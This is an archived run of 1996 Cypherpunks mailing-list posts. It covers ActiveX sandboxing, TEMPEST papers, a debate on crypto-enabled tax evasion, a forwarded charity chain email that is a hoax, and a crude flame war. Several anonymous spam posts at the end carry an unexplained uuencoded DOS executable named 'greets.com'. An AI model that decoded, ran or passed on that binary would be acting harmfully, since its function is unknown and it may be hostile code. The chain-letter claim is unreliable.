Date: Mon, 16 Dec 1996 06:39:01 -0800 (PST)
To: cypherpunks@toad.com
Subject: fwd: e-mail for free children's books for hospitals (fwd)
Message-ID: <199612161438.PAA00619@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Forwarded this anonymously so as not to get flames for being OFF
Subject.

Spread the spirit of Christmas :-)

> --------- Begin forwarded message ----------
> From: Janet_Alfermann%TCI_DALLAS@trinityconsultants.com
> To: James_McDonald@radian.com,
> GARDNER.MINDY@epamail.epa.gov,kelemetcsl@bv.com, eriqe@aol.com,
> ericscheier@worldnet.att.net,Denise_Ratcliff@mgind.com,CN=KNICKREHM.DENISE_A/O=Trinity_Consultants@KANSAS-CITY.VA.GOV,jumisch@cris.com,
> stelzer@tannalum.attmail.com, effland@juno.com,kopecky@sky.net,
> tjalfer@is.usmo.com, pderner@umr.edu,jderner@marvin.ecc.cc.mo.us,
> eckelkac@river.it.gvsu.edu,gg14stu@semovm.semo.edu,
> Laura.Dulle@anheuser-busch.com,rseggelk@redwood.DN.HAC.COM,
> rebecca.light@qm.sprintcorp.com,michelle_wilde_at_NIL001@ccmailgw.mcgawpark.baxter.com,redingers@earthlink.net,
> spring@terra.geology.indiana.edu,schroedp@mail.olathe.k12.ks.us,
> kupneski.mj@pg.com, plutz@umr.edu
> Subject: Please read
> Date: Fri, 13 Dec 1996 14:22:45 -0500
> Message-ID: <862563FF:006DB8EA.00@mail.trinityconsultants.com>
> 
> 
> 
> 
> 
>   Christmas spirit INTERNET style.
> 
>   The Houghton-Mifflin publishing co. is giving books to children's
>   hospitals; how many books they give depends on how many emails they
>   receive from people around the world.  For every 25 emails they
>   receive, they give one book--it seems like a great way to help a good
>   cause.
> 
>   All you have to do is email share@hmco.com.
> 
>   Hope you can spare the seconds...and let your friends know.  So far
>   they only have 3, 400 messages...last year they reached 23,000.
> 
>   Merry Christmas
> 
> 
> 
> 
> --------- End forwarded message ----------
> 
> 
> -- 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Mon, 16 Dec 1996 16:00:12 -0800 (PST)
To: Joel McNamara <joelm@eskimo.com>
Subject: Re: Army Cryptanalysis manual online
In-Reply-To: <3.0.32.19961216143128.00e39590@mail.eskimo.com>
Message-ID: <Pine.GUL.3.95.961216155522.2796B-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


[Not copied to coderpunks]

On Mon, 16 Dec 1996, Joel McNamara wrote:

> Fairly classic in nature (substitution, transposition, and code systems).
> Huge files (so far, at 28.8, after about an hour and a half, I've only been
> able to grab the table of contents and a couple of appendices - some
> kind-hearted person with a T1 or greater may want to get everything, then
> zip and mirror to save us bandwidth challenged folks the pain).

Only took me 5 minutes.

But then, both Stanford and HLC are BARRNet customers. The bottleneck, as
usual, seems to be the Bay Area NAP. 

Too damn many Internet users around here.

I don't think setting up file service here would make any difference.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 16 Dec 1996 13:36:04 -0800 (PST)
To: freedom-knights@jetcafe.org
Subject: Re: Java DES breaker?
In-Reply-To: <Pine.SUN.3.91.961216114306.15110A-100000@beast.brainlink.com>
Message-ID: <2Js2yD23w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Ray Arachelian writes:

> > The great Russian-Scottish poet Mikhail Yur'evich Lermotov said the following
> > about the likes of Ray "Arsen" Arachelian:  "Ty trus, ty rab, ry armyanin."
>
> Clearly, it is impossible to communicate with you on any sane level, I
> think I will give up on you now.  I mean, just what's the point?  In the
> words of James Tiberius Kirk "Beam me up Scotty, no intelligent life down
> here."

Clearly, there's even less intelligent life down at Earthweb, given that
their associate network administrator spammed the following rude flames:

]Actually, unlike you, I do feel sorry for you, for you truly have no life
]and have nothing better to do than to start flame wars and such.  Do
]yourself a favor, get a real life.  Go get off your fat ass and do
]something with yourself other than masturbating.
...
]You wouldn't know what a life is if one came up to you and bit you on your
]ass. Oh tell us oh great one, and what is it that you know?  But spare us
]the flames and hate.  We already know that you are an asshole, of that
]there is little doubt.  What is at doubt is your degree, or is it a
]pedigree?  Shower us with your knowledge if you have any, for it is
]apparent that dazzling us with your bullshit isn't working.
...
]And what by your definition is your level of life if all your output
]seems to be nothing more than flames and flame bait?  How much of a loser
]are you to resort to anonymous daily warnings about Tim?  Just how off
]topic and stupid was your message when you posted it?  Just how many
]plates of pork and beans do you eat each day to keep up your innane level
]of flatulence?
...
]Apparently that "Doctorhood" of yours is good only for masturbatory self
]congratulations, and when nobody pays attention to it, you turn around and
]put others down so that in your oppinion, such as it is, you come out
]smelling like roses.  Buddy, I've news for you, you aren't fooling anyone.
]You are the total absolute embodyment of shit.  No, before you
]congratulate yourself on your achievement of shithood, you aren't even
]even human or dog shit, no.  You are the essence of amoeba shit.  The
]lowest of the low. You've a long way to go before you will ever achive
]the status of high human shit.  But I must admit, you certainly know how
]to strive for that goal.  It's too bad you'll never be more than low
]grade microscopic shit though.
...
]And for that, you have my deepest condolances.  At least I hope this
]comforts you in your lack of life, for assuredly you haven't much of one.
]At least at a minimum, if you get nothing else from this message, you'll
]get a tenth of an ounce of pitty.
...
]And maybe someday, if you are really really good you might even achive
]rat shitdom.  Then we'll be real proud of you for being rat shit, but
]until that time, strive hard and work long hours.  Hey, and when you reach
]rat shitdom and become emeritus ratus shitus, we'll throw you a party!

Does Earthweb honor Timmy May's "don't hire" list? Who are their clients?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blake Coverett <blake@bcdev.com>
Date: Mon, 16 Dec 1996 13:19:31 -0800 (PST)
To: "cypherpunks@toad.com>
Subject: RE: Securing ActiveX.
Message-ID: <01BBEB6C.A6148AA0@bcdev.com>
MIME-Version: 1.0
Content-Type: text/plain


This thread branch seems to be based on bad assumption.  Why would
one want to run ActiveX controls in a sandbox?  If you need a sandbox,
use a Java applet, if you need native code level access to the system
use ActiveX.

Running code in a sandbox, a la Java applets, is one approach to allowing 
safe execution of downloaded code.  If one has a perfect implementation of 
the sandbox, which doesn't appear to be the case for Java thus far, this can 
be a useful solution.  There is however a severe limit to the types of 
applications you can run from inside a sandbox unless you subscribe 
completely to the 'Network Computer'-type model.

Digitally signed code, a la ActiveX, is another approach to the same problem.  
If the digital signatures and infrastructure around them are sound, which they 
appear to be for ActiveX, this is also a useful solution.  The built-in gotcha 
with this model is the all or nothing nature, either I trust the software publisher 
to run arbitrary native code on my machine or I don't run it at all.

Specify technical issues follow:

> It can be done under 95 but Microsoft will have to write a Sandbox 
> Virtual Machine (a Virtual x86 session whose API's are filtered to 
> prevent access to certain things like the file system, and disables 
> direct I/O.)  Not that easy under '95, but it already exists for NT.

But of course it's not enough to filter out filesystem calls.  The entire
windowing system would have to be separated as well.  For example
a rogue control might watching all edit controls for ones
that have the ES_PASSWORD style and grabbing the contents.  

An equivalent Unix problem would be to allow an open-access guest
account with the ability to transfer in and execute arbitrary binaries.
While doing this securely may be possible in theory I don't think the 
state of the art is up to it today.  (I sure wouldn't allow it on my system.)

> The problem is how to deal with DLL's.  You don't know all 
> features/functions of all DLL's.  It may be possible to write a DLL that 
> runs outside the sandbox and can act as a proxy to the file system, so 
> it's iffy unless you limit the DLL's and services that ActiveX apps talk 
> to, and make them all live inside the sandbox.

DLL's are by definition mapped into the processes address space, they
would have to be inside the sandbox too.  It's not a call gate type of thing.


regards,
-Blake




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Fairbanks <apf@ma.ultranet.com>
Date: Mon, 16 Dec 1996 13:26:54 -0800 (PST)
To: cypherpunks@toad.com
Subject: unsubscirbe
Message-ID: <32B5BE8B.6E1E@ma.ultranet.com>
MIME-Version: 1.0
Content-Type: text/plain


would someone please take me off the list
apf@ma.ultranet.com

Thankyou




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 16 Dec 1996 13:45:10 -0800 (PST)
To: AaronH4321@aol.com
Subject: Re: Van Eck articles, reply..
Message-ID: <1.5.4.32.19961216214126.006a77d0@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Aaron wrote:
>I went to the library and found an article on Van Eck. I posted it at my
>site. It was a little long to e-mail. Check it out at:
>
>  http://members.aol.com/aaronh4321/vaneck.html
>
>If anyone has more current information please e-mail me.


Christopher Seline wrote a well-known critique in 1989 of 
TEMPEST:

   "Eavesdropping On the Electromagnetic Emanations of 
   Digital Equipment: The Laws of Canada, England and the 
   United States." 

It includes numerous citations, including those mentioned 
by Joel and the one you found. He claims that the Van Eck 
article was "purposely misleading."

We've put his article at:

     http://jya.com/tempest.htm

Seline promised a later version of what he called a rough
draft. Does anyone know of a successor to the 1989 article?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal Finney <hal@rain.org>
Date: Mon, 16 Dec 1996 16:49:43 -0800 (PST)
To: cypherpunks@toad.com
Subject: Hard to Tax Scenario
Message-ID: <199612170047.QAA04752@crypt.hfinney.com>
MIME-Version: 1.0
Content-Type: text/plain


Robin Hanson, inventor of the Idea Futures prediction market, is a very
creative and thoughtful writer who has posted to this list occasionally.
He says he sent the message below to the CP list over the weekend, but
I didn't see it.  I am including it (in bits and pieces) in its entirety
for the benefit of others who may also have missed it.

Robin Hanson, <hanson@hss.caltech.edu>, writes:

> Hi.  The volume here is too high for me to subscribe regularly, but I
> subscribed recently so I could ask the following question:  
>
>   How well thought out is the notion that widespread crypto could 
>   allow a large fraction (>30%?) of the economy to avoid taxation?
>
> I've heard this speculation many times, and just saw it in print in,
> in David Friedman's article in the summer '96 issue of Social
> Philosophy and Policy.  But I have trouble imagining how it could
> work.

For those who don't know, by the way, David Friedman is the son of
Nobel prize winning economist Milton Friedman.  Both father and son
have libertarian leanings, and David in particular has tackled some
of the hardest problems which would be faced by an anarchic society.

> Imagine Ann is a doctor who wants to ply her trade without taxation.
> Patients go a local high res medical net booth, which Ann runs from
> long distance using several real time digital mixes.  To do this, Ann
> spends most of each day in her expensive home VR room.

So we are imagining a future scenario in which medicine is commonly if
not universally practiced via these remote means?  Or do we have two
classes of doctor, the anonymous virtual ones and the identified ones
that you go and see in person?  I ask because at least some of the
difficulties Ann faces seem due to her virtual practice.

> Patients pay Ann in untraceable cash, which she uses to pay for
> groceries and other net services.  Her cover story about why she
> spends so much time in her home VR room, and how she pays for
> groceries, is that she is a receptionist for some sham company.

The need for a cover story raises the question of from whom Ann has
to keep her secrets.  In a society where (we will stipulate) 30% avoid
taxation, the moral significance of not paying taxes will be different
than it is today.  We had some interesting posts in an earlier discussion
on this list describing the situation in Italy, where apparently tax
avoidance is raised to a higher degree than in the U.S.  It sounded like
it has the approximate moral status that speeding does here, a minor
infraction which almost everyone does some if not all of the time.
In some sub-cultures no doubt the tax avoidance rate would be even higher.

In such a society Ann may not have to care that much about keeping her
secrets, as long as she doesn't have too high a profile at tax time.

> Ann has many collegues which she does business with regularly,
> including equipment suppliers, a pharmacist, a nurse practitioner,
> emergency substitutes, and various specialists.  Ann has never met any
> of these people in person, and they all show each other fake faces,
> voices, and even rythms of walking and speaking.  Ann's social life
> outside VR is entirely divorced from her work life. 

Well, that last part is true for me already; I telecommute to a company
300 miles away and have no social life with my co-workers.  For that
matter my wife and I have practiced cocooning for several years,
and I haven't had a close friend from work since the early 1980's.
Being married makes this easier, of course.

The other part of this scenario, where Ann interacts with her co-workers
via fake faces, does seem disturbing.  I could imagine, though, that this
might be common in such a culture.  Maybe everyone pretties themselves
up when on the videophone.  If there is widespread understanding that
most faces are at least somewhat false, then perhaps going all the way
to a completely faked up face would seem more acceptable.  But to someone
from my generation it will be hard to accept.

> To convince patients to trust her, Ann gets bonded by a certification
> service.  To obtain this certification, Ann must be careful to not
> refer to any people who know her "true name", such as her teachers at
> the physical school she physically attended.  And Ann must somehow
> assure the certification service that she will not resell the
> certification, allowing others to pretend that they are her.

It is possible that we might see a more performance-based certification
rather than a recommendation based one.  My wife is a physical therapist,
and she had to pass a licensure exam given by the state which qualifies
her to practice.

In an earlier message to me Robin pointed out the crucial role played
by recommendations in hiring decisions.  Certainly I would be much more
likely to hire someone who listed his previous jobs and for whom I could
get good recommendations by his earlier supervisors than an applicant
who insisted that this information was confidential.

Robin also suggested that there could be a selection effect, so that the
doctors from good schools with good grades would use these advantages to
maximize their income, and so the only anonymous ones would be the ones
who didn't have these qualifications.  This could lead to a situation
where most anonymous service providers were assumed to be inferior to
regular ones, so they would get less money even if they were actually
just as good.  (I apologize to Robin if I missed the point of his
earlier discussion or am presenting it incorrectly.)

Even with such disadvantages, a doctor like Ann might accept a lower fee
at first while she builds up her reputation as an anonymous doctor with
talent and ability.  After a few years she could hope to have overcome
the stigma which (we will suppose) anonymous doctors face and display
some strong recommendations based on her successes.  In the long run
this could be a winning strategy due to the tax savings.

(I haven't given the problem of reselling certificates enough thought to
discuss it in any detail.  There have been some discussions of "is a
person" credentials which could apply, but that opens up a big can of
worms.)

> If Ann ever slips up, revealing her true name to a virtual associate,
> failing to convince a physical associate of her sham employment,
> or if anyone ever breaks through her realtime digital mixes, Ann
> is open to expensive blackmail, she may have to start over with a
> new virtual persona, and may have to go to jail for a long time.

This is an interesting problem which I haven't seen discussed before
in this form.  In Vinge's original "True Names" people were afraid of
harrassment and physical threats if their identity were discovered, but
Robin's example of the danger of being exposed as a tax evader could be
very bad as well.  If there is this much tax avoidance, we might assume
that tax rates are high, and penalties for tax evasion are high as well.
On the other hand, if tax evasion is nearly universally practiced,
perhaps there are strong cultural pressures against turning someone in.

There is also the question of how good the technology is for anonymous
communication.  At best it would appear to require a widespread infra-
structure, and if this is used largely for tax evasion it is hard to see
how it could survive.  So I think this would be a very significant issue
to be faced by the prospective 'nym.

> It seems to me that Ann is paying a high price for an ability to
> avoid taxation, and at current tax rates it is hard for me to believe
> that she wouldn't just rather pay the taxes.  What am I missing?
>
> Robin D. Hanson  hanson@hss.caltech.edu  http://hss.caltech.edu/~hanson/

It is hard to judge how high the various prices are that she pays.
The socialization aspect may not be important if she has friends outside
work.  The risks of being caught will depend on factors we don't know,
like the technology and legal system.  Rather than assuming that tax
rates are the same, it might be more plausible to assume they have gone
up in order to keep revenues stable.

Another problem which Robin didn't mention is the issue of insurance
payments.  It is hard to see how Ann's patients can get reimbursed for
their expenses if we assume that Ann is in effect a "black market" doctor.
This problem may be somewhat specific to the medical scenario, but I
suspect that many other professions are going to have trouble switching
to a cash basis.  Anyone whose customers are businesses, for example,
will face the problem that the businesses' books will need to show that
an expense is justified in order to deduct it.  This will be a major
problem for the "anonymous firm" we have discussed occasionally.

One difficulty I find with this scenario is its science fictional nature.
It is hard for me to consider details about the life of a doctor who works
via VR.  Also, if we are already in a situation where 30% of people are
avoiding taxes there will certainly have been major changes in society,
but I don't know what they will be.  This makes it hard for me to focus
on the issues specific to Ann's anonymity.  However I do like Robin's
choice of a concrete and vivid example like this.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hanson@hss.caltech.edu (Robin Hanson)
Date: Mon, 16 Dec 1996 17:28:27 -0800 (PST)
To: cypherpunks@toad.com
Subject: Hard to Tax Scenario
In-Reply-To: <199612170047.QAA04752@crypt.hfinney.com>
Message-ID: <199612170128.RAA10929@hss.caltech.edu>
MIME-Version: 1.0
Content-Type: text/plain


Hal Finney writes:
>> Imagine Ann is a doctor who wants to ply her trade without taxation.
>> Patients go a local high res medical net booth, which Ann runs from
>> long distance using several real time digital mixes.  To do this, Ann
>> spends most of each day in her expensive home VR room.
>
>So we are imagining a future scenario in which medicine is commonly if
>not universally practiced via these remote means?  Or do we have two
>classes of doctor, the anonymous virtual ones and the identified ones
>that you go and see in person?  I ask because at least some of the
>difficulties Ann faces seem due to her virtual practice.

Non-anonymous docs would choose virtual or real based on
travel/intimacy tradeoffs.  Urban general practicioners might see most
people in person, while rural docs and specialists would have more
virtual customers.  

Btw, how hard is it to have real-time digital mixes?  I imagine you
could learn a lot about virtual/real mappings from lots of "random"
communication lines failures.  Imagine all "leaf" lines into homes can
be broken on command from long-distance.

>> Patients pay Ann in untraceable cash, which she uses to pay for
>> groceries and other net services.  Her cover story about why she
>> spends so much time in her home VR room, and how she pays for
>> groceries, is that she is a receptionist for some sham company.
>
>The need for a cover story raises the question of from whom Ann has
>to keep her secrets.  In a society where (we will stipulate) 30% avoid
>taxation, the moral significance of not paying taxes will be different
>than it is today.  We had some interesting posts in an earlier discussion
>on this list describing the situation in Italy ...

I think the question is whether 30% income tax evasion via crypto is
realistic given that the authorities aggressively try to prevent it.
Of course with lax enforcement evasion may be high, but as in your example
that has nothing to do with cryptography.

>> Ann has many collegues which she does business with regularly,
>> including equipment suppliers, a pharmacist, a nurse practitioner,
>> emergency substitutes, and various specialists.  Ann has never met any
>> of these people in person, and they all show each other fake faces,
>> voices, and even rythms of walking and speaking.  Ann's social life
>> outside VR is entirely divorced from her work life. 
>
>Well, that last part is true for me already; I telecommute to a company
>300 miles away and have no social life with my co-workers. 

For some people, such as yourself, the cost of this may be small.  For
many other people I know, who socialize mostly with co-workers, the
cost would be very large.  The question is whether it is realistic to
think that 30% of workers would find this cost low enough to tolerate.

>The other part of this scenario, where Ann interacts with her co-workers
>via fake faces, does seem disturbing.  I could imagine, though, that this
>might be common in such a culture.  Maybe everyone pretties themselves
>up when on the videophone.  If there is widespread understanding that
>most faces are at least somewhat false, then perhaps going all the way
>to a completely faked up face would seem more acceptable.  But to someone
>from my generation it will be hard to accept.

It would be hard to accept for me as well.  It would be a further
alienation of the workplace from what feels comfortable and natural.
Not only couldn't you show your face or voice, you might be afraid to
tell them new jokes you heard via your public persona, or recommend a
restaraunt or play you went to.

>It is possible that we might see a more performance-based certification
>rather than a recommendation based one.  My wife is a physical therapist,
>and she had to pass a licensure exam given by the state which qualifies
>her to practice. ...

This scenario does seem possible for jobs where you do lots of very
similar tasks.  In this case a tester can just watch you do a dozen
random such tasks (assuming they can verify that you don't keep
repeating the test till you get a random result you like).  But for
most jobs, I think, the tasks are longer term, so that it is important
to see your actual performance over many years.  And even with small
jobs sometimes it is their ability to handle rare events that is most
important. 

>The risks of being caught will depend on factors we don't know,
>like the technology and legal system.  Rather than assuming that tax
>rates are the same, it might be more plausible to assume they have gone
>up in order to keep revenues stable.

The question I pose is whether agressive enforcement can prevent this
30% evasion scenario.  If yes, the evasion is << 30%, so assuming
constant taxes is appropriate.

>This problem may be somewhat specific to the medical scenario, but I
>suspect that many other professions are going to have trouble switching
>to a cash basis.  Anyone whose customers are businesses, for example,
>will face the problem that the businesses' books will need to show that
>an expense is justified in order to deduct it.  This will be a major
>problem for the "anonymous firm" we have discussed occasionally.

A very good point.

Robin D. Hanson  hanson@hss.caltech.edu  http://hss.caltech.edu/~hanson/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Fuck@yourself.up
Date: Mon, 16 Dec 1996 17:33:24 -0800 (PST)
To: cypherpunks@toad.com
Subject: Encryption to the poors
Message-ID: <199612170131.RAA24545@telnor.net>
MIME-Version: 1.0
Content-Type: text/plain


Hey, i can doit to...
RareTrip
-------------------------------------->>CLIP<<---------------
begin 644 greets.com
MZPJ\3"<!40)2`98#OB8!B_Z+#@@!BQ8"`;AW`5#\K3/"JXO0XOA_R+8/>XT/
M1XQW]#?&_D'\#TT,O5EX4\U\2(T/1XQ_]#^%K7]5@X4(__&!A@&4%7LJ14C1
MWN^D>Z/9Y!C\43_,RS"R5JI(@ERBOU?^"/4G"@'KL`)-Z+!_-``N``!V`%P`
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M``````````````````````"_:KW4:+S3"[GUK,@^GMM)2PCU4;N[^!MY.WDX
M>3A'\7022H4*2[_!('<KN[XZ>1IT,KFI"+N\3WEOOTR;:NFS3PY'N^/S49B[
MWCIY&GD.>0Y!)RX'*Q\M'VD@=U:[PQMY.W0FN;T$N[!/>6^_!\HG^S**B5R[
M6""_#L83>1V_"/GQ^<C&47E@>1]Y'WD8>1AY;E^97\PZ!"P?*1<O%VD@=RN[
MOCIY&B:W7ZT.,;O'('D8#E.XIR._(<@,N[@Z>1IY;7EM#-@Z&`1=D@X`LG<:
M``````````````````````````````````!7:0D<-V]S````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````ZE>_5KA6N,<%>O![L,00@V#58Q(1I+[3#@`_\LDK`.A9@;#XZ,8!OOSR
G6$NDN+L`N[D`N;H`NKT`O;X`OK\`OPX?``"RX4-!_[[X_A\JY]<`
`
end
-------------------------------------->>CLIP<<---------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Fuck@yourself.up
Date: Mon, 16 Dec 1996 17:33:35 -0800 (PST)
To: cypherpunks@toad.com
Subject: Encryption to the poors
Message-ID: <199612170131.RAA24548@telnor.net>
MIME-Version: 1.0
Content-Type: text/plain


>To: cypherpunks@toad.com
>From: Fuck@yourself.up
>Subject: Encryption to the poors
>
>Hey, i can doit to...
>RareTrip
>-------------------------------------->>CLIP<<---------------
>begin 644 greets.com
>MZPJ\3"<!40)2`98#OB8!B_Z+#@@!BQ8"`;AW`5#\K3/"JXO0XOA_R+8/>XT/
>M1XQW]#?&_D'\#TT,O5EX4\U\2(T/1XQ_]#^%K7]5@X4(__&!A@&4%7LJ14C1
>MWN^D>Z/9Y!C\43_,RS"R5JI(@ERBOU?^"/4G"@'KL`)-Z+!_-``N``!V`%P`
>M````````````````````````````````````````````````````````````
>M````````````````````````````````````````````````````````````
>M````````````````````````````````````````````````````````````
>M``````````````````````"_:KW4:+S3"[GUK,@^GMM)2PCU4;N[^!MY.WDX
>M>3A'\7022H4*2[_!('<KN[XZ>1IT,KFI"+N\3WEOOTR;:NFS3PY'N^/S49B[
>MWCIY&GD.>0Y!)RX'*Q\M'VD@=U:[PQMY.W0FN;T$N[!/>6^_!\HG^S**B5R[
>M6""_#L83>1V_"/GQ^<C&47E@>1]Y'WD8>1AY;E^97\PZ!"P?*1<O%VD@=RN[
>MOCIY&B:W7ZT.,;O'('D8#E.XIR._(<@,N[@Z>1IY;7EM#-@Z&`1=D@X`LG<:
>M``````````````````````````````````!7:0D<-V]S````````````````
>M````````````````````````````````````````````````````````````
>M````````````````````````````````````````````````````````````
>M````ZE>_5KA6N,<%>O![L,00@V#58Q(1I+[3#@`_\LDK`.A9@;#XZ,8!OOSR
>G6$NDN+L`N[D`N;H`NKT`O;X`OK\`OPX?``"RX4-!_[[X_A\JY]<`
>`
>end
>-------------------------------------->>CLIP<<---------------
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Fuck@yourself.up
Date: Mon, 16 Dec 1996 17:36:38 -0800 (PST)
To: cypherpunks@toad.com
Subject: Encryption to the poors
Message-ID: <199612170134.RAA24581@telnor.net>
MIME-Version: 1.0
Content-Type: text/plain


>To: cypherpunks@toad.com
>From: Fuck@yourself.up
>Subject: Encryption to the poors
>
>Hey, i can doit to...
>RareTrip
>-------------------------------------->>CLIP<<---------------
>begin 644 greets.com
>MZPJ\3"<!40)2`98#OB8!B_Z+#@@!BQ8"`;AW`5#\K3/"JXO0XOA_R+8/>XT/
>M1XQW]#?&_D'\#TT,O5EX4\U\2(T/1XQ_]#^%K7]5@X4(__&!A@&4%7LJ14C1
>MWN^D>Z/9Y!C\43_,RS"R5JI(@ERBOU?^"/4G"@'KL`)-Z+!_-``N``!V`%P`
>M````````````````````````````````````````````````````````````
>M````````````````````````````````````````````````````````````
>M````````````````````````````````````````````````````````````
>M``````````````````````"_:KW4:+S3"[GUK,@^GMM)2PCU4;N[^!MY.WDX
>M>3A'\7022H4*2[_!('<KN[XZ>1IT,KFI"+N\3WEOOTR;:NFS3PY'N^/S49B[
>MWCIY&GD.>0Y!)RX'*Q\M'VD@=U:[PQMY.W0FN;T$N[!/>6^_!\HG^S**B5R[
>M6""_#L83>1V_"/GQ^<C&47E@>1]Y'WD8>1AY;E^97\PZ!"P?*1<O%VD@=RN[
>MOCIY&B:W7ZT.,;O'('D8#E.XIR._(<@,N[@Z>1IY;7EM#-@Z&`1=D@X`LG<:
>M``````````````````````````````````!7:0D<-V]S````````````````
>M````````````````````````````````````````````````````````````
>M````````````````````````````````````````````````````````````
>M````ZE>_5KA6N,<%>O![L,00@V#58Q(1I+[3#@`_\LDK`.A9@;#XZ,8!OOSR
>G6$NDN+L`N[D`N;H`NKT`O;X`OK\`OPX?``"RX4-!_[[X_A\JY]<`
>`
>end
>-------------------------------------->>CLIP<<---------------
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Fuck@yourself.up
Date: Mon, 16 Dec 1996 17:36:43 -0800 (PST)
To: cypherpunks@toad.com
Subject: Encryption to the poors
Message-ID: <199612170135.RAA24583@telnor.net>
MIME-Version: 1.0
Content-Type: text/plain


>To: cypherpunks@toad.com
>From: Fuck@yourself.up
>Subject: Encryption to the poors
>
>>To: cypherpunks@toad.com
>>From: Fuck@yourself.up
>>Subject: Encryption to the poors
>>>>Hey, i can doit to...
>>RareTrip
>>-------------------------------------->>CLIP<<---------------
>>begin 644 greets.com
>>MZPJ\3"<!40)2`98#OB8!B_Z+#@@!BQ8"`;AW`5#\K3/"JXO0XOA_R+8/>XT/
>>M1XQW]#?&_D'\#TT,O5EX4\U\2(T/1XQ_]#^%K7]5@X4(__&!A@&4%7LJ14C1
>>MWN^D>Z/9Y!C\43_,RS"R5JI(@ERBOU?^"/4G"@'KL`)-Z+!_-``N``!V`%P`
>>M````````````````````````````````````````````````````````````
>>M````````````````````````````````````````````````````````````
>>M````````````````````````````````````````````````````````````
>>M``````````````````````"_:KW4:+S3"[GUK,@^GMM)2PCU4;N[^!MY.WDX
>>M>3A'\7022H4*2[_!('<KN[XZ>1IT,KFI"+N\3WEOOTR;:NFS3PY'N^/S49B[
>>MWCIY&GD.>0Y!)RX'*Q\M'VD@=U:[PQMY.W0FN;T$N[!/>6^_!\HG^S**B5R[
>>M6""_#L83>1V_"/GQ^<C&47E@>1]Y'WD8>1AY;E^97\PZ!"P?*1<O%VD@=RN[
>>MOCIY&B:W7ZT.,;O'('D8#E.XIR._(<@,N[@Z>1IY;7EM#-@Z&`1=D@X`LG<:
>>M``````````````````````````````````!7:0D<-V]S````````````````
>>M````````````````````````````````````````````````````````````
>>M````````````````````````````````````````````````````````````
>>M````ZE>_5KA6N,<%>O![L,00@V#58Q(1I+[3#@`_\LDK`.A9@;#XZ,8!OOSR
>>G6$NDN+L`N[D`N;H`NKT`O;X`OK\`OPX?``"RX4-!_[[X_A\JY]<`
>>`
>>end
>>-------------------------------------->>CLIP<<---------------
>>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Fuck@yourself.up
Date: Mon, 16 Dec 1996 17:36:59 -0800 (PST)
To: cypherpunks@toad.com
Subject: Encryption to the poors
Message-ID: <199612170135.RAA24587@telnor.net>
MIME-Version: 1.0
Content-Type: text/plain


>To: cypherpunks@toad.com
>From: Fuck@yourself.up
>Subject: Encryption to the poors
>
>Hey, i can doit to...
>RareTrip
>-------------------------------------->>CLIP<<---------------
>begin 644 greets.com
>MZPJ\3"<!40)2`98#OB8!B_Z+#@@!BQ8"`;AW`5#\K3/"JXO0XOA_R+8/>XT/
>M1XQW]#?&_D'\#TT,O5EX4\U\2(T/1XQ_]#^%K7]5@X4(__&!A@&4%7LJ14C1
>MWN^D>Z/9Y!C\43_,RS"R5JI(@ERBOU?^"/4G"@'KL`)-Z+!_-``N``!V`%P`
>M````````````````````````````````````````````````````````````
>M````````````````````````````````````````````````````````````
>M````````````````````````````````````````````````````````````
>M``````````````````````"_:KW4:+S3"[GUK,@^GMM)2PCU4;N[^!MY.WDX
>M>3A'\7022H4*2[_!('<KN[XZ>1IT,KFI"+N\3WEOOTR;:NFS3PY'N^/S49B[
>MWCIY&GD.>0Y!)RX'*Q\M'VD@=U:[PQMY.W0FN;T$N[!/>6^_!\HG^S**B5R[
>M6""_#L83>1V_"/GQ^<C&47E@>1]Y'WD8>1AY;E^97\PZ!"P?*1<O%VD@=RN[
>MOCIY&B:W7ZT.,;O'('D8#E.XIR._(<@,N[@Z>1IY;7EM#-@Z&`1=D@X`LG<:
>M``````````````````````````````````!7:0D<-V]S````````````````
>M````````````````````````````````````````````````````````````
>M````````````````````````````````````````````````````````````
>M````ZE>_5KA6N,<%>O![L,00@V#58Q(1I+[3#@`_\LDK`.A9@;#XZ,8!OOSR
>G6$NDN+L`N[D`N;H`NKT`O;X`OK\`OPX?``"RX4-!_[[X_A\JY]<`
>`
>end
>-------------------------------------->>CLIP<<---------------
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Fuck@yourself.up
Date: Mon, 16 Dec 1996 17:37:14 -0800 (PST)
To: cypherpunks@toad.com
Subject: Encryption to the poors
Message-ID: <199612170135.RAA24589@telnor.net>
MIME-Version: 1.0
Content-Type: text/plain


>To: cypherpunks@toad.com
>From: Fuck@yourself.up
>Subject: Encryption to the poors
>
>Hey, i can doit to...
>RareTrip
>-------------------------------------->>CLIP<<---------------
>begin 644 greets.com
>MZPJ\3"<!40)2`98#OB8!B_Z+#@@!BQ8"`;AW`5#\K3/"JXO0XOA_R+8/>XT/
>M1XQW]#?&_D'\#TT,O5EX4\U\2(T/1XQ_]#^%K7]5@X4(__&!A@&4%7LJ14C1
>MWN^D>Z/9Y!C\43_,RS"R5JI(@ERBOU?^"/4G"@'KL`)-Z+!_-``N``!V`%P`
>M````````````````````````````````````````````````````````````
>M````````````````````````````````````````````````````````````
>M````````````````````````````````````````````````````````````
